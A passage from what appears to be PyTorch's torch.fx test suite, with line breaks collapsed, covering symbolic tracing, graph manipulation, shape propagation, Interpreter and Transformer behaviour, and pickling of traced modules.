self.sa(*x) ul = UnpacksList() with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'): symbolic_trace(ul) def test_unpack_dict_better_error(self): class SomeKwargs(torch.nn.Module): def forward(self, x=3, y=4): return torch.rand(3, 4) class UnpacksDict(torch.nn.Module): def __init__(self): super().__init__() self.sk = SomeKwargs() def forward(self, x : dict): return self.sk(**x) ud = UnpacksDict() with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'): symbolic_trace(ud) def test_pretty_print_targets(self): # Test that Graph pretty-print prints friendly name for targets # in `operator` and `builtins` class SomeMod(torch.nn.Module): def forward(self, x): return torch.add(x.foo + x.bar, 3.0) traced = symbolic_trace(SomeMod()) graph_str = str(traced.graph) self.assertIn('builtins.getattr', graph_str) self.assertIn('operator.add', graph_str) self.assertIn('torch.add', graph_str) def test_pretty_print_node(self): class M(torch.nn.Module): def __init__(self): 
super().__init__() self.param: torch.nn.Parameter = torch.nn.Parameter( torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x: torch.Tensor, y: int = 2): return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0) traced = symbolic_trace(M()) all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes]) FileCheck().check("x").check("placeholder") \ .check("y").check("placeholder") \ .check("getitem").check("call_function") \ .check("param").check("get_attr") \ .check("add").check("call_function") \ .check("linear").check("call_module") \ .check("clamp").check("call_method") \ .run(all_formatted) def test_script_tensor_constant(self): # TorchScript seems to ignore attributes that start with `__`. # We used to call anonymous Tensor values `__tensor_constant*`, but # they were getting ignored by script. Now they're called # `_tensor_constant*` class IHaveATensorConstant(torch.nn.Module): def forward(self, x): return x + torch.rand(3, 4) traced = torch.fx.symbolic_trace(IHaveATensorConstant()) torch.jit.script(traced) def test_autowrap_functions(self): class AutowrapFnTest(torch.nn.Module): def forward(self, x): return fx_int(x.shape[0] / 2) class AutowrapFnTest2(torch.nn.Module): def forward(self, x): return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2) # Check function(s) are wrapped # `int` would normally throw a TypeError as argument can't be `Proxy` tracer = Tracer(autowrap_functions=(fx_int,)) graph = tracer.trace(AutowrapFnTest()) traced = GraphModule(tracer.root, graph, 'test') tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2)) tracer_2.trace(AutowrapFnTest2()) # Test scriptability traced_scripted = torch.jit.script(traced) self.assertEqual(traced_scripted(torch.rand(4)), 2) def test_torch_fx_len(self): class FXLenTest(torch.nn.Module): def forward(self, x): return len(x) traced = symbolic_trace(FXLenTest()) self.assertEqual(traced(torch.rand(3, 4)), 3) # Test scriptability scripted = torch.jit.script(FXLenTest()) self.assertEqual(scripted(torch.rand(3)), 3) traced_scripted = torch.jit.script(traced) self.assertEqual(traced_scripted(torch.rand(3)), 3) # Test non-proxy len class FXLenTest2(torch.nn.Module): def __init__(self): super().__init__() self.l = [3, 4, 5] def forward(self, x): return x + len(self.l) traced2 = symbolic_trace(FXLenTest2()) inp = torch.rand(3, 4) self.assertEqual(traced2(inp), inp + 3.0) self.assertIs(len, builtins.len) def test_torch_fx_getattr(self): class FXGetattrTest(torch.nn.Module): def forward(self, x): return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3])) traced = symbolic_trace(FXGetattrTest()) self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3])) def test_sqrt(self): class Sqrt1(torch.nn.Module): def forward(self, x): return sqrt(x.size(0)) class Sqrt2(torch.nn.Module): def forward(self, x): return math.sqrt(x.size(0)) class Sqrt3(torch.nn.Module): def forward(self, x): return x + math.sqrt(2) + sqrt(2) self.checkGraphModule(Sqrt1(), [torch.zeros(8)]) self.checkGraphModule(Sqrt2(), [torch.zeros(8)]) self.checkGraphModule(Sqrt3(), [torch.zeros(8)]) self.assertIs(sqrt, _sqrt) self.assertIs(math.sqrt, _sqrt) def test_torch_custom_ops(self): class M(torch.nn.Module): def forward(self, a): b = torch.ops.aten.sigmoid(a) c = torch.ops.aten.cat([a, b]) return torch.ops.aten.cat((c, c)) m = M() input = torch.randn(3) ref_out = m(input) gm = symbolic_trace(m) gm.graph.lint() out = gm(input) self.assertEqual(out, ref_out) def test_pickle_torch_custom_ops(self): class M(torch.nn.Module): def 
forward(self, a): b = torch.ops.aten.sigmoid(a) c = torch.ops.aten.cat([a, b]) return torch.ops.aten.cat((c, c)) m = M() input = torch.randn(3) ref_out = m(input) gm = symbolic_trace(m) gm.graph.lint() pickled = pickle.dumps(gm) loaded = pickle.loads(pickled) self.assertEqual(loaded(input), gm(input)) def test_pretty_print(self): st = SimpleTest() traced = symbolic_trace(st) traced.graph.lint() printed = str(traced) assert 'SimpleTest()' in printed assert 'torch.relu' in printed def test_pretty_print_graph(self): class KwargPrintTest(torch.nn.Module): def forward(self, x): return torch.squeeze(x + 3.0, dim=2) st = KwargPrintTest() traced = symbolic_trace(st) traced.graph.lint() stringed = str(traced.graph) for s in ['args', 'kwargs', '#users']: assert s in stringed def test_custom_proxy_type(self): class TensorPair: def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair(x : TensorPair, y : TensorPair): s = x.add(y) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) y = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) ref_out = use_tensor_pair(x, y) traced = symbolic_trace(use_tensor_pair) traced_out = traced(x, y) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_type_literal(self): class TensorPair(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair_literal(x : TensorPair): s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3))) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) ref_out = use_tensor_pair_literal(x) traced = symbolic_trace(use_tensor_pair_literal) traced_out = traced(x) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_dynamic_value(self): class TensorPair(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor): s = x.add(TensorPair(y, y)) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) y = torch.randn(5, 3) ref_out = use_tensor_pair_ctor(x, y) traced = symbolic_trace(use_tensor_pair_ctor) traced_out = traced(x, y) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_input_dependent_control_flow(self): class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, inp): if inp.sum() == 0: self.is_zero = True self.tensor = torch.tensor([]) else: self.is_zero = False self.tensor = inp def add(self, other): if self.is_zero: return ZeroTensor(other.tensor) elif other.is_zero: return self def use_zero_tensor(x : torch.Tensor, y : torch.Tensor): return ZeroTensor(x + y) x, y = torch.randn(5, 3), torch.randn(5, 3) ref_out = use_zero_tensor(x, y) traced = symbolic_trace(use_zero_tensor) 
traced_out = traced(x, y) self.assertEqual(traced_out.is_zero, ref_out.is_zero) self.assertEqual(traced_out.tensor, ref_out.tensor) def test_graph_fns(self): g = Graph() a = g.placeholder('a') b = g.call_module('linear', (a,)) c = g.get_attr('bias') d = g.call_method('add', (b, c)) e = g.call_function(torch.sin, (d,)) g.output(e) mod = torch.nn.Module() mod.linear = torch.nn.Linear(3, 4) mod.bias = torch.rand(4) gm = GraphModule(mod, g) gm.graph.lint() input = torch.rand(3) r = gm(input) ref = torch.sin(mod.linear(input) + mod.bias) self.assertEqual(r, ref) def test_remove_uses(self): g : torch.fx.Graph = Graph() x : torch.fx.Node = g.placeholder('x') relu : torch.fx.Node = g.call_function(torch.relu, (x,)) neg : torch.fx.Node = g.call_function(torch.neg, (relu,)) g.output(neg) neg.replace_all_uses_with(relu) g.erase_node(neg) self.assertTrue(neg not in relu.users) def test_nonetype_annotation(self): eb = torch.nn.EmbeddingBag(3, 4) symbolic_trace(eb) def test_pickle_nonetype_annotation(self): eb = torch.nn.EmbeddingBag(10, 3, mode='sum') traced = symbolic_trace(eb) pickled = pickle.dumps(traced) loaded = pickle.loads(pickled) loaded.graph.lint() input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9]) offsets = torch.LongTensor([0, 4]) self.assertEqual(loaded(input, offsets), traced(input, offsets)) def test_return_tuple(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: return (x, x + x) original = M() traced = symbolic_trace(original) self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1))) def test_construct_root_dict(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,)) c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) linear_mod : torch.nn.Module = torch.nn.Linear(3, 4) add_param : torch.Tensor = torch.rand(3, 4) gm : torch.fx.GraphModule = torch.fx.GraphModule( {'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph) gm.graph.lint() assert 'self.foo.bar.baz' in gm.code x : torch.Tensor = torch.rand(3, 3) out : torch.Tensor = gm(x) ref_out : torch.Tensor = linear_mod(x) + add_param self.assertEqual(out, ref_out) def test_symbolic_trace_assert(self): class AssertsTensorShape(torch.nn.Module): def forward(self, x): torch._assert(x.shape[1] > 4, "assert_foobar") return x m = AssertsTensorShape() # verify traceability traced = symbolic_trace(m) # verify assertion on traced model works correctly at runtime traced(torch.rand(4, 5)) with self.assertRaisesRegex(AssertionError, "assert_foobar"): traced(torch.rand(4, 3)) # verify the symbolically traced module is scriptable ms = torch.jit.script(m) with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"): ms(torch.rand(4, 3)) def test_fx_create_arg(self): class CustomArgObject: def __init__(self, x, y): self.x = x self.y = y def __fx_create_arg__(self, tracer: torch.fx.Tracer): return tracer.create_node( "call_function", CustomArgObject, args=( tracer.create_arg(self.x), tracer.create_arg(self.y), ), kwargs={}, ) class HasCustomArgObjectWhenLeaf(torch.nn.Module): def forward(self, o: CustomArgObject): # Not normally traceable; good reason to make # this module a leaf. 
for x in o.x: o.y += x return o.y class Root(torch.nn.Module): def __init__(self): super().__init__() self.inner = HasCustomArgObjectWhenLeaf() def forward(self, x, y): o = CustomArgObject(x, y) return self.inner(o) class CreateArgTracer(torch.fx.Tracer): def is_leaf_module(self, m, module_qualified_name): return type(m) is HasCustomArgObjectWhenLeaf m = Root() graph = CreateArgTracer().trace(m) gm = torch.fx.GraphModule(m, graph) assert "CustomArgObject(" in gm.code def test_trace_fn_constant(self): some_constant = torch.rand(3, 4) def add_const(x): return some_constant + x traced = symbolic_trace(add_const) input = torch.rand(3, 4) self.assertEqual(traced(input), add_const(input)) def test_copy_no_remap(self): traced = symbolic_trace(SimpleTest()) g = traced.graph copied = torch.fx.Graph() for node in g.nodes: copied.node_copy(node) with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'): copied.lint() def test_wrong_topo(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,)) c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) nodes = list(graph.nodes) nodes[3].append(nodes[2]) with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'): graph.lint() def test_wrong_target_type(self): graph : torch.fx.Graph = torch.fx.Graph() with self.assertRaises(ValueError): n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo', args=(), kwargs={}) def test_example_shape_prop(self): class TestCase(torch.nn.Module): def __init__(self): super().__init__() self.attr = torch.randn(3, 4) self.submod = torch.nn.Linear(4, 4) def forward(self, x): return torch.neg(self.submod(x.relu() + self.attr)) tc = TestCase() tc_traced = symbolic_trace(tc) ref_out = tc_traced(torch.rand(3, 4)) shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4)) # Make sure we're testing all opcodes opcodes = set() output_shape : Optional[torch.Shape] = None output_stride : Optional[Tuple[int]] = None for node in tc_traced.graph.nodes: opcodes.add(node.op) if node.op == 'output': output_shape = node.args[0].meta['tensor_meta'].shape output_stride = node.args[0].meta['tensor_meta'].stride self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method', 'call_module', 'output'])) # Test shape propogation and make sure results match actual self.assertEqual(output_shape, ref_out.shape) self.assertEqual(output_stride, ref_out.stride()) def test_shape_prop_layout(self): class ConvTest(torch.nn.Module): def __init__(self): super().__init__() self.conv_mod = torch.nn.Conv2d(5, 5, 3) def forward(self, x): return self.conv_mod(x) # contiguous layout test_mod = ConvTest() traced = symbolic_trace(test_mod) x = torch.randn(5, 5, 224, 224) shape_prop.ShapeProp(traced).propagate(x) assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format for node in traced.graph.nodes)) x_channels_last = x.contiguous(memory_format=torch.channels_last) traced.to(memory_format=torch.channels_last) shape_prop.ShapeProp(traced).propagate(x_channels_last) for node in traced.graph.nodes: # NB: the implementation of conv may not preserve the memory format, # unfortunately. 
The best we can do is just check that the placeholder # node is channels-last if node.op in {'placeholder'}: self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last) def test_shape_prop_aggregate(self): class ReturnTwo(torch.nn.Module): def forward(self, x): return (3, torch.sum(x)) class UnderTest(torch.nn.Module): def __init__(self): super().__init__() self.rt = ReturnTwo() def forward(self, x): return self.rt(x) ut = UnderTest() class RTTracer(torch.fx.Tracer): def is_leaf_module(self, m, module_qualified_name): return type(m) is ReturnTwo graph = RTTracer().trace(ut) mod = torch.fx.GraphModule(ut, graph) shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4)) for node in mod.graph.nodes: if node.op == 'call_module': assert 'tensor_meta' in node.meta tensor_meta = node.meta['tensor_meta'] assert tensor_meta[0] == 3 assert tensor_meta[1].shape == torch.Size([]) def test_shape_prop_layout_3d(self): class ConvTest3d(torch.nn.Module): def __init__(self): super().__init__() self.conv_mod = torch.nn.Conv3d(5, 5, 3) def forward(self, x): return self.conv_mod(x) test_mod_3d = ConvTest3d() traced_3d = symbolic_trace(test_mod_3d) x_3d = torch.randn(5, 5, 224, 224, 15) shape_prop.ShapeProp(traced_3d).propagate(x_3d) assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format for node in traced_3d.graph.nodes)) x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d) traced_3d.to(memory_format=torch.channels_last_3d) shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d) for node in traced_3d.graph.nodes: # NB: the implementation of conv may not preserve the memory format, # unfortunately. The best we can do is just check that the placeholder # node is channels-last if node.op in {'placeholder'}: self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d) def test_interpreter(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) interpreter = Interpreter(gm) input = torch.randn(3, 4) self.assertEqual(interpreter.run(input), gm(input)) self.assertEqual(interpreter.run(input), m(input)) def test_interpreter_run_node_override(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) class RunNodeInterpreter(Interpreter): def __init__(self, module): super().__init__(module) def run_node(self, n : Node) -> Any: result = super().run_node(n) n.cached_value = result return result input = torch.randn(3, 4) RunNodeInterpreter(gm).run(input) for node in gm.graph.nodes: assert hasattr(node, 'cached_value') def test_interpreter_onthefly_swap(self): def fn(x): return torch.sigmoid(x).neg() gm = torch.fx.symbolic_trace(fn) class NegSigmSwapInterpreter(Interpreter): def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == torch.sigmoid: return torch.neg(*args, **kwargs) return super().call_function(n) def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == 'neg': call_self, *args_tail = args return call_self.sigmoid(*args_tail, **kwargs) return super().call_method(n) input = torch.randn(3, 4) result = 
NegSigmSwapInterpreter(gm).run(input) self.assertEqual(result, torch.neg(input).sigmoid()) def test_interpreter_partial_eval(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) gm = torch.fx.symbolic_trace(MyModule()) interp = Interpreter(gm) env = {} for node in gm.graph.nodes: if node.op == 'call_module' and node.target == 'linear': env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0 break assert len(env) == 1 x = torch.randn(3, 4) result = interp.run(x, initial_env=env) self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0)) def test_interpreter_star_args(self): def with_star_args(x, *args): return x + args[0] gm = torch.fx.symbolic_trace(with_star_args) interp = Interpreter(gm) result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4)) self.assertEqual(result, torch.ones(3, 4) * 2.0) @skipIfNoTorchVision def test_interpreter_noop_resnet18(self): rn18 = torchvision_models.resnet18() transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform() inp = torch.randn(5, 3, 224, 224) self.assertEqual(transformed(inp), rn18(inp)) @skipIfNoTorchVision def test_interpreter_gc_values(self): rn18 = torchvision_models.resnet18() interp = Interpreter(symbolic_trace(rn18)) inp = torch.rand(5, 3, 224, 224) out = interp.run(inp) env_key_names = set(n.name for n in interp.env.keys()) self.assertEqual(env_key_names, set(['output'])) def test_transformer_noop(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) new_gm = Transformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(new_gm(input), gm(input)) def test_transformer_op_swap(self): def fn(x): return torch.sigmoid(x).neg() gm = torch.fx.symbolic_trace(fn) class NegSigmSwapXformer(Transformer): def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == torch.sigmoid: return torch.neg(*args, **kwargs) return super().call_function(n) def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == 'neg': call_self, *args_tail = args return call_self.sigmoid(*args_tail, **kwargs) return super().call_method(n) transformed = NegSigmSwapXformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(transformed(input), torch.neg(input).sigmoid()) def test_transformer_multi_outputs(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): x = x + self.param out = self.linear(x) return x, out m = MyModule() gm = torch.fx.symbolic_trace(m) new_gm = Transformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(new_gm(input), gm(input)) def test_fn_type_annotations(self): class Foo(torch.nn.Module): def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]: return {'a': p.x + p.y + z + i} foo_scripted = torch.jit.script(Foo()) foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3) fxed = symbolic_trace(Foo()) fxed_scripted = torch.jit.script(fxed) fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3) def 
test_fn_type_annotation_empty(self): def forward(a : List[torch.Tensor]): return a[0] torch.jit.script(symbolic_trace(forward)) def test_wrapped_method(self): def wrap_with_relu(fn): @functools.wraps(fn) def wrapper(*args, **kwargs): return torch.relu(fn(*args, **kwargs)) return wrapper class Foo(torch.nn.Module): @wrap_with_relu def forward(self, x, w): return torch.matmul(x, w) f = Foo() traced = symbolic_trace(f) x, w = torch.rand(3, 4), torch.rand(4, 4) self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes)) def test_empty_graph_codegen(self): graph = torch.fx.Graph() gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(gm(), None) def test_sequential(self): m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1)) gm = torch.fx.symbolic_trace(m) gm_copy = copy.deepcopy(gm) def test_ctx_mgr(self): @contextlib.contextmanager def do_nothing(): yield class M(torch.nn.Module): def __init__(self): super().__init__() @do_nothing() def forward(self, x): return torch.relu(x) m = M() self.checkGraphModule(m, (torch.rand(3, 4),)) def test_typename_print(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,), type_expr=List[float]) output : torch.fx.Node = graph.output(b) self.assertTrue('typing.List[float]' in str(graph)) def test_layout(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x): return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0) traced = symbolic_trace(M()) x = torch.rand(5, 9, 3, 4) self.assertEqual(traced(x), torch.zeros_like(x)) def test_ellipsis(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x, y): return x + y[:, 1:10, ...] 
traced = symbolic_trace(M()) x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4) self.assertEqual(traced(x, y), x + y[:, 1:10, ...]) def test_inf_nan(self): class FooMod(torch.nn.Module): def forward(self, x): return x + float('inf'), x + float('-inf'), x + float('nan') fm = FooMod() self.checkGraphModule(fm, (torch.rand(3, 4),)) def test_inf_nan_kwds(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf') c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan') graph.output((b, c)) gm = torch.fx.GraphModule(torch.nn.Module(), graph) x = torch.rand(3, 4) self.assertEqual(gm(x), (x + float('inf'), x + float('nan'))) def test_deepcopy_recursion_depth(self): depth = sys.getrecursionlimit() + 20 g = torch.fx.Graph() x = g.placeholder('x') for i in range(depth): x = g.call_function(torch.relu, (x,)) g.output(x) copied_graph = copy.deepcopy(g) val_map = {} for orig_node, new_node in zip(g.nodes, copied_graph.nodes): val_map[orig_node] = new_node for orig_node, new_node in zip(g.nodes, copied_graph.nodes): orig_users = set(orig_node.users.keys()) orig_users_equiv = set(val_map[u] for u in orig_users) new_users = set(new_node.users.keys()) self.assertEqual(orig_users_equiv, new_users) @skipIfNoTorchVision def test_replace_uses(self): rn18 = torchvision_models.resnet18() class LowerReluTracer(torch.fx.Tracer): def is_leaf_module(self, m : torch.nn.Module, qualname : str): if isinstance(m, torch.nn.ReLU): return False return super().is_leaf_module(m, qualname) rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18)) to_erase = [] for node in rn18_traced.graph.nodes: if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]: kwargs = node.kwargs.copy() # Neg doesn't have in-place kwargs.pop('inplace') with rn18_traced.graph.inserting_before(node): new_node = rn18_traced.graph.call_function( the_function=torch.neg, args=node.args, kwargs=node.kwargs) node.replace_all_uses_with(replace_with=new_node) to_erase.append(node) for node in to_erase: rn18_traced.graph.erase_node(node) def test_replace_input(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) b.replace_input_with(x, y) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input_x = torch.randn(33, 44) input_y = torch.randn(11, 22) self.assertEqual(gm(input_x, input_y), torch.relu(input_y)) def test_insertion_point(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) with graph.inserting_before(b): neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,)) _, *relu_args = b.args b.args = (neg, *relu_args) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input = torch.randn(33, 44) self.assertEqual(gm(input), torch.relu(torch.neg(input))) def test_update_args_api(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', 
target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph) inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5) self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x)) b.update_arg(0, y) new_gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y)) def test_update_kwargs_api(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x}) output : torch.fx.Node = graph.output(b) orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph) inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5) self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x)) b.update_kwarg('input', y) new_gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y)) def test_move_before(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,)) _, *relu_args = b.args b.args = (neg, *relu_args) b.prepend(neg) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input = torch.randn(33, 44) self.assertEqual(gm(input), torch.relu(torch.neg(input))) def test_prepend_self(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) b.prepend(b) x.append(b) self.assertEqual(len(graph.nodes), 3) def test_erase_node_error(self): st = SimpleTest() traced = symbolic_trace(st) for node in traced.graph.nodes: # Test deleting with uses both in another Node and at the output if node.target in [operator.add, torch.relu]: with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'): traced.graph.erase_node(node) def test_copy_it(self): d = immutable_dict([(3, 4), (5, 6)]) l = immutable_list([(3, 4), (5, 6)]) self.assertEqual(d, deepcopy(d)) self.assertEqual(l, deepcopy(l)) def test_get_torch_func_signature(self): for key in dir(torch): obj = getattr(torch, key) if callable(obj): schemas = get_signature_for_torch_op(obj) def test_find_uses(self): graph = torch.fx.Graph() x = torch.fx.Proxy(graph.placeholder('x')) y = torch.relu(x) z = x + x u = torch.neg(x) graph.output((y + z + u).node) graph.lint() users_of_x = x.node.users self.assertEqual(len(users_of_x), 3) expected_ops = set(['relu', 'add', 'neg']) for use in users_of_x: assert any(use.name.startswith(prefix) for prefix in expected_ops) def test_inline_graph(self): class InlineInto(torch.nn.Module): def forward(self, x): return torch.relu(x) class ToInline(torch.nn.Module): def forward(self, x): return torch.neg(x) inline_into = symbolic_trace(InlineInto()) to_inline = symbolic_trace(ToInline()) combined_graph = torch.fx.Graph() output_node = combined_graph.graph_copy(inline_into.graph, {}) input_node = list(to_inline.graph.nodes)[0] assert input_node and input_node.op == 'placeholder' val_map = {input_node : output_node} output = combined_graph.graph_copy(to_inline.graph, val_map) combined_graph.output(output) combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph) 
input = torch.rand(3, 4) self.assertEqual(combined_module(input), input.relu().neg()) def test_multi_insert_point(self): graph = torch.fx.Graph() x = torch.fx.Proxy(graph.placeholder('x')) relu = torch.relu(x) with graph.inserting_before(relu.node): y = torch.neg(x) z = torch.tanh(y) graph.output((relu.node, z.node)) graph.lint() expected_ops = ['x', 'neg', 'tanh', 'relu'] for node, expected in zip(graph.nodes, expected_ops): assert expected in node.name def test_reassign_args_kwargs_uses(self): graph = torch.fx.Graph() x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y')) z = x + y zed = z + z + z graph.output(zed.node) graph.lint() # zed = z + z + z -> zed = z + z + x zed.node.args = (zed.node.args[0], x.node) self.assertEqual(x.node.users.keys(), [z.node, zed.node]) # z = x + y -> z = y + y z.node.args = (y.node, y.node) self.assertEqual(x.node.users.keys(), [zed.node]) def test_trace_function(self): def foo(x, y): return torch.relu(x) + y x, y = torch.randn(3, 4), torch.randn(3, 4) self.checkGraphModule(foo, (x, y)) def test_trace_dict_int_keys(self): class 